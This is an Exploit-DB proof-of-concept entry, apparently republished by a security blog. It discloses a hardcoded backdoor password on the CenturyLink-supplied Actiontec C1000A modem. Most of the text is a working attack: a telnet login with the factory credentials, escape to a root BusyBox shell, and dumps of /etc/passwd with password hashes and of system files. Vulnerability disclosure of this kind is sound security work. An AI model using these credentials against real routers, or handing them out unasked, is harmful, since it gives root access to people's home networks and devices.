Provided via Exploit-DB.com

EDB-ID: 43118 Author: Joseph McDonagh Published: 2017-11-04
CVE: N/A Type: Remote Platform: Hardware
E-DB Verified: Waiting verification Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A

# Exploit Title: Actiontec C1000A backdoor account
# Google Dork: NA
# Date: 11/04/2017
# Exploit Author: Joseph McDonagh
# Vendor Homepage: https://actiontecsupport.zendesk.com/hc/en-us
# Software Link: N/A Hardware
# Version: Firmware CAC003-31.30L.86
# Tested on: Linux
# CVE : NA

# The Actiontec C1000A Modem provided by CenturyLink has hardcoded passwords. This is similar to another recent submission by Matthew Shiemo, who inspired me to check the device I use.

# Proof of Concept

$ telnet 192.168.0.1
===Actiontec xDSL Router===
Login: admin
Password: CenturyL1nk
> sh

BusyBox v1.17.2 (2015-10-30 10:34:29 CST built-in shell (ash)
Enter ‘help’ for a list of build-in commands

# cat /etc/passwd
admin:Rtqa.nQhYPBRo:0:0:Administratir:/:/bin/sh
support:vmiTSa8ukDkOY:0:0:Technical Support:/:/bin/sh
user:Fq10qi6QmLmmY:0:0:Normal User:/:/bin/sh
nobody:rZy3YulyLvuYU:0:0:nobody for ftp:/bin/sh
# cat /proc/version
Linux version 2.6.30 ([email protected]) (gcc version 4.4.2 (Buildroot 2010.02-git) ) #1 SMP PREEMPT Fri Oct 30 12:32:15 CST 2015
# cat /etc/group
root::0:root,admin,support,user

The post Actiontec C1000A Modem – Backdoor Account by CentryLink Proof of Concept PoC appeared first on Computer Security Security News, Blog, Exploits, Shop & Services.